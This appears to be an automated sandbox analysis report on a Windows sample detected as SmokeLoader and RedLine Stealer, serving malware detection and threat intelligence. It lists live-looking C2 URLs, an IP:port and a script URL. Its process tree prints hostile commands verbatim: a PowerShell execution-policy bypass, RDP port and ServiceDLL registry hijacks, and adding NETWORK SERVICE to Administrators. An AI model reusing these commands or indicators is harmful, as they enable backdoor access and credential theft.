Analysis
-
max time kernel
151s -
max time network
147s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09-12-2021 16:36
Static task
static1
Behavioral task
behavioral1
Sample
4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe
Resource
win10-en-20211208
General
-
Target
4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe
-
Size
298KB
-
MD5
fb74576efd1396c8e6456bbf55736b9d
-
SHA1
106da8bdf7845b3370ddd19b9a8e82add6c069b9
-
SHA256
4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee
-
SHA512
20b479f2887b1a0f3296c13cf8075fbf778a82ba6c7b2f8cf60838f22f1c6192429764a62b396c7dc4a44df4cc1a56a0d0dbd035f54c90c5594c00afe1b4c1b2
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
195.133.47.114:38627
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/1632-123-0x0000000000E80000-0x0000000000EE8000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\4BFA.exe family_redline C:\Users\Admin\AppData\Local\Temp\4BFA.exe family_redline behavioral1/memory/3312-153-0x0000000000B80000-0x0000000000BEC000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 95 4488 powershell.exe 97 4488 powershell.exe 98 4488 powershell.exe 99 4488 powershell.exe 101 4488 powershell.exe 103 4488 powershell.exe 105 4488 powershell.exe 107 4488 powershell.exe 109 4488 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
4003.exe4BFA.exe6242.exeA901.exepid process 1632 4003.exe 700 4BFA.exe 3312 6242.exe 1288 A901.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 396 -
Loads dropped DLL 2 IoCs
Processes:
pid process 780 780 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
4003.exe6242.exepid process 1632 4003.exe 3312 6242.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI363.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI374.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI384.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1swgrk4x.z4w.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wjfrvm0b.g12.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI353.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI385.tmp powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 28aae2c489ecd701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 101 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 97 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 98 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exepid process 3376 4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe 3376 4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 396 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 396 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 628 628 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exepid process 3376 4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
4BFA.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 396 Token: SeCreatePagefilePrivilege 396 Token: SeShutdownPrivilege 396 Token: SeCreatePagefilePrivilege 396 Token: SeShutdownPrivilege 396 Token: SeCreatePagefilePrivilege 396 Token: SeShutdownPrivilege 396 Token: SeCreatePagefilePrivilege 396 Token: SeDebugPrivilege 700 4BFA.exe Token: SeShutdownPrivilege 396 Token: SeCreatePagefilePrivilege 396 Token: SeShutdownPrivilege 396 Token: SeCreatePagefilePrivilege 396 Token: SeShutdownPrivilege 396 Token: SeCreatePagefilePrivilege 396 Token: SeDebugPrivilege 2200 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeIncreaseQuotaPrivilege 1452 powershell.exe Token: SeSecurityPrivilege 1452 powershell.exe Token: SeTakeOwnershipPrivilege 1452 powershell.exe Token: SeLoadDriverPrivilege 1452 powershell.exe Token: SeSystemProfilePrivilege 1452 powershell.exe Token: SeSystemtimePrivilege 1452 powershell.exe Token: SeProfSingleProcessPrivilege 1452 powershell.exe Token: SeIncBasePriorityPrivilege 1452 powershell.exe Token: SeCreatePagefilePrivilege 1452 powershell.exe Token: SeBackupPrivilege 1452 powershell.exe Token: SeRestorePrivilege 1452 powershell.exe Token: SeShutdownPrivilege 1452 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeSystemEnvironmentPrivilege 1452 powershell.exe Token: SeRemoteShutdownPrivilege 1452 powershell.exe Token: SeUndockPrivilege 1452 powershell.exe Token: SeManageVolumePrivilege 1452 powershell.exe Token: 33 1452 powershell.exe Token: 34 1452 powershell.exe Token: 35 1452 powershell.exe Token: 36 1452 powershell.exe Token: SeDebugPrivilege 4528 powershell.exe Token: SeIncreaseQuotaPrivilege 4528 powershell.exe Token: SeSecurityPrivilege 4528 powershell.exe Token: SeTakeOwnershipPrivilege 4528 powershell.exe Token: SeLoadDriverPrivilege 4528 powershell.exe Token: SeSystemProfilePrivilege 4528 powershell.exe Token: SeSystemtimePrivilege 4528 powershell.exe Token: SeProfSingleProcessPrivilege 4528 powershell.exe Token: SeIncBasePriorityPrivilege 4528 powershell.exe Token: SeCreatePagefilePrivilege 4528 powershell.exe Token: SeBackupPrivilege 4528 powershell.exe Token: SeRestorePrivilege 4528 powershell.exe Token: SeShutdownPrivilege 4528 powershell.exe Token: SeDebugPrivilege 4528 powershell.exe Token: SeSystemEnvironmentPrivilege 4528 powershell.exe Token: SeRemoteShutdownPrivilege 4528 powershell.exe Token: SeUndockPrivilege 4528 powershell.exe Token: SeManageVolumePrivilege 4528 powershell.exe Token: 33 4528 powershell.exe Token: 34 4528 powershell.exe Token: 35 4528 powershell.exe Token: 36 4528 powershell.exe Token: SeDebugPrivilege 3868 powershell.exe Token: SeIncreaseQuotaPrivilege 3868 powershell.exe Token: SeSecurityPrivilege 3868 powershell.exe Token: SeTakeOwnershipPrivilege 3868 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 396 396 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 396 396 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
A901.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 396 wrote to memory of 1632 396 4003.exe PID 396 wrote to memory of 1632 396 4003.exe PID 396 wrote to memory of 1632 396 4003.exe PID 396 wrote to memory of 700 396 4BFA.exe PID 396 wrote to memory of 700 396 4BFA.exe PID 396 wrote to memory of 700 396 4BFA.exe PID 396 wrote to memory of 3312 396 6242.exe PID 396 wrote to memory of 3312 396 6242.exe PID 396 wrote to memory of 3312 396 6242.exe PID 396 wrote to memory of 1288 396 A901.exe PID 396 wrote to memory of 1288 396 A901.exe PID 1288 wrote to memory of 2200 1288 A901.exe powershell.exe PID 1288 wrote to memory of 2200 1288 A901.exe powershell.exe PID 2200 wrote to memory of 3088 2200 powershell.exe csc.exe PID 2200 wrote to memory of 3088 2200 powershell.exe csc.exe PID 3088 wrote to memory of 2324 3088 csc.exe cvtres.exe PID 3088 wrote to memory of 2324 3088 csc.exe cvtres.exe PID 2200 wrote to memory of 1236 2200 powershell.exe csc.exe PID 2200 wrote to memory of 1236 2200 powershell.exe csc.exe PID 1236 wrote to memory of 4896 1236 csc.exe cvtres.exe PID 1236 wrote to memory of 4896 1236 csc.exe cvtres.exe PID 2200 wrote to memory of 1452 2200 powershell.exe powershell.exe PID 2200 wrote to memory of 1452 2200 powershell.exe powershell.exe PID 2200 wrote to memory of 4528 2200 powershell.exe powershell.exe PID 2200 wrote to memory of 4528 2200 powershell.exe powershell.exe PID 2200 wrote to memory of 3868 2200 powershell.exe powershell.exe PID 2200 wrote to memory of 3868 2200 powershell.exe powershell.exe PID 2200 wrote to memory of 3440 2200 powershell.exe reg.exe PID 2200 wrote to memory of 3440 2200 powershell.exe reg.exe PID 2200 wrote to memory of 3376 2200 powershell.exe reg.exe PID 2200 wrote to memory of 3376 2200 powershell.exe reg.exe PID 2200 wrote to memory of 4092 2200 powershell.exe reg.exe PID 2200 wrote to memory of 4092 2200 powershell.exe reg.exe PID 2200 wrote to memory of 4484 2200 powershell.exe net.exe PID 2200 wrote to memory of 4484 2200 powershell.exe net.exe PID 4484 wrote to memory of 3808 4484 net.exe net1.exe PID 4484 wrote to memory of 3808 4484 net.exe net1.exe PID 2200 wrote to memory of 3276 2200 powershell.exe cmd.exe PID 2200 wrote to memory of 3276 2200 powershell.exe cmd.exe PID 3276 wrote to memory of 4292 3276 cmd.exe cmd.exe PID 3276 wrote to memory of 4292 3276 cmd.exe cmd.exe PID 4292 wrote to memory of 1000 4292 cmd.exe net.exe PID 4292 wrote to memory of 1000 4292 cmd.exe net.exe PID 1000 wrote to memory of 812 1000 net.exe net1.exe PID 1000 wrote to memory of 812 1000 net.exe net1.exe PID 2200 wrote to memory of 4228 2200 powershell.exe cmd.exe PID 2200 wrote to memory of 4228 2200 powershell.exe cmd.exe PID 4228 wrote to memory of 3552 4228 cmd.exe cmd.exe PID 4228 wrote to memory of 3552 4228 cmd.exe cmd.exe PID 3552 wrote to memory of 1096 3552 cmd.exe net.exe PID 3552 wrote to memory of 1096 3552 cmd.exe net.exe PID 1096 wrote to memory of 1284 1096 net.exe net1.exe PID 1096 wrote to memory of 1284 1096 net.exe net1.exe PID 508 wrote to memory of 1900 508 cmd.exe net.exe PID 508 wrote to memory of 1900 508 cmd.exe net.exe PID 1900 wrote to memory of 2368 1900 net.exe net1.exe PID 1900 wrote to memory of 2368 1900 net.exe net1.exe PID 2644 wrote to memory of 3932 2644 cmd.exe net.exe PID 2644 wrote to memory of 3932 2644 cmd.exe net.exe PID 3932 wrote to memory of 2824 3932 net.exe net1.exe PID 3932 wrote to memory of 2824 3932 net.exe net1.exe PID 4744 wrote to memory of 2600 4744 cmd.exe net.exe PID 4744 wrote to memory of 2600 4744 cmd.exe net.exe PID 2600 wrote to memory of 4840 2600 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe"C:\Users\Admin\AppData\Local\Temp\4355c228e17427a764df96301a586f75de53b22890a82c4d855dc8d795541bee.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\4003.exeC:\Users\Admin\AppData\Local\Temp\4003.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\4BFA.exeC:\Users\Admin\AppData\Local\Temp\4BFA.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\6242.exeC:\Users\Admin\AppData\Local\Temp\6242.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\A901.exeC:\Users\Admin\AppData\Local\Temp\A901.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sspx5pzl\sspx5pzl.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC8AB.tmp" "c:\Users\Admin\AppData\Local\Temp\sspx5pzl\CSC53E0BCE51A914CD18F16A05A6216C87B.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1vyoltyj\1vyoltyj.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCE77.tmp" "c:\Users\Admin\AppData\Local\Temp\1vyoltyj\CSC285CBF85822E46DCA078DA8B30FCF1C.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
